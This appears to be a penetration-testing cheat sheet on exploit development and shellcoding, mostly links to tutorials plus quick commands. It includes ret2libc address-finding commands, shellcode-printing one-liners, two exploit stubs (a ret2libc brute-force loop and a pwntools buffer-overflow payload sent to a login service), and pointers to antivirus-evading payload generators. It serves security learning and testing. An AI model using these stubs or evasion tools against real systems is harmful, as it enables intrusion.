Exploits and shellcoding
Quick Reference¶
- Hexdump (python format):
hexdump -v -e '"\\""x" 1/1 "%02x" ""' example.exe
- Print hex encoded string in text:
printf $(cat file.txt | tr -d '\n')
- Passing binary data as arguments:
command $(python -c 'print ...')
- Passing binary data as standard input:
python -c 'print ...' | command
- Use file as input and then read from standard input:
cat file - | command
python -c 'print ...' | cat file - | command
- Cross compile with - mingw32
i586-mingw32msvc-gcc a.c wine a.exe
export file=shell i686-w64-mingw32-gcc -c -O3 -march=i686 $file.c i686-w64-mingw32-gcc $file.o -o $file.exe -O3 -march=i686 -Wl,-lws2_32 /usr/i686-w64-mingw32/bin/strip $file.exe
- Printing shell code
(Bash) echo -e '\x31\xc0\x50\x68\x2f...' (Python) python -c 'print "\x31\xc0\x50\x68\x2f..."' (Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'
- American fuzzy lop is a security-oriented fuzzer: http://lcamtuf.coredump.cx/afl/
- A fork of AFL for fuzzing Windows binaries: https://github.com/googleprojectzero/winafl
- Using WinAFL to Fizz WinRar (unacev2.dll): https://research.checkpoint.com/extracting-code-execution-from-winrar/
- FoRTE-Research's Fuzzing Benchmarks: https://github.com/FoRTE-Research/FoRTE-FuzzBench
Buffer Overflow¶
- Buffer Overflow Attack - Computerphile: https://www.youtube.com/watch?v=1S0aBV-Waeo
- Binary Exploitation - Buffer Overflow Explained in Detail: https://0xrick.github.io/binary-exploitation/bof1/
Tools - Detection / Testing: - Program to detect the existence of remote / local stack-based buffer-overflow vulnerabilities (FTP, IMAP, POP3 and SMTP): https://github.com/iricartb/buffer-overflow-vulnerability-services-tester-tool - https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
- ret2libc
- Find libc address:
ldd /usr/local/bin/backup
- Find libc
function: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
- Find libc
function: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
- Find libc
reference: strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
- Find libc address:
- https://github.com/justinsteven/dostackbufferoverflowgood
- vsftpd backdoor: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- HTB - Octomber:
Exploit Stubs
import struct, subprocess
libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b
payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)
attempts = 0
while True:
attempts += 1
print "Attempts: " + attempts
subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])
from pwn import *
shellcode = ""
payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('', 7411)
print r.recv(1024)
r.sendline('USER admin')
print r.recv(1024)
r.sendline('PASS ' + payload)
Simple SUID Binary
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
return 0;
Lateral Movement¶
- LATERAL MOVEMENT USING THE MMC20.APPLICATION COM OBJECT: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
- LATERAL MOVEMENT VIA DCOM: ROUND 2: https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
- LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
Perform additional checks on memory, to help prevent malicious code from running on a system.
Prevent code execution from data pages, by raising an exception, when execution occurs.
- Windows - Bypass Data Execution Protection (DEP): https://0x00sec.org/t/bypass-data-execution-protection-dep/6988
- Linux - Exploit Mitigation Techniques - Data Execution Prevention (DEP): https://0x00sec.org/t/exploit-mitigation-techniques-data-execution-prevention-dep/4634
Randomizes the base addresses of loaded applications, and DLLs, every time the Operating System is booted.
- Bypass Windows Exploit Guard ASR - https://github.com/sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019
- Load a custom library and override functions of a program
g++ test.cpp -std=c++11 -shared -o test.so -fPIC #PIC=Position independent code LD_PRELOAD=test.so ldd ./exampleapp
- A small, null-free port binding shellcode for 32-bit versions of Windows: https://code.google.com/archive/p/w32-bind-ngs-shellcode/
- SEToolKit ’s Powershell alphanumeric shellcode injector to generate a Meterpreter payload that will bypass Windows Defender
- Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created: [Intro] [Pro-features]
- Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions: https://github.com/Veil-Framework/Veil
- Memorize the 8086 opcodes
- Heap Exploitation | Playing with chunks!: https://0x00sec.org/t/heap-exploitation-playing-with-chunks/2055
- Heap Exploitation - Fastbin Attack: https://0x00sec.org/t/heap-exploitation-fastbin-attack/3627
- Analysis of public exploits or my 1day exploits: https://github.com/externalist/exploit_playground
- Shellcoding for Linux and Windows Tutorial: http://www.vividmachines.com/shellcode/shellcode.html
- Voltron is an extensible debugger UI toolkit written in Python: https://github.com/snare/voltron
- Reverse Shell from an OpenVPN Configuration File: https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da
- EXEC in Many Languages: https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Payloads/exec-system-languages.md
Windows Specific
- Modern Windows Userspace Exploitation: https://media.ccc.de/v/35c3-9660-modern_windows_userspace_exploitation
- Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]: http://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html
- Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]: http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
- Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]: http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html
- Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]: http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html
- Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]: http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html
- Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]: http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html
- Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/
Return oriented programming (ROP)
- 64-bit ROP | You rule ‘em all!: https://0x00sec.org/t/64-bit-rop-you-rule-em-all/1937
- SROP | Signals, you say? (Sigreturn Oriented Programming): https://0x00sec.org/t/srop-signals-you-say/2890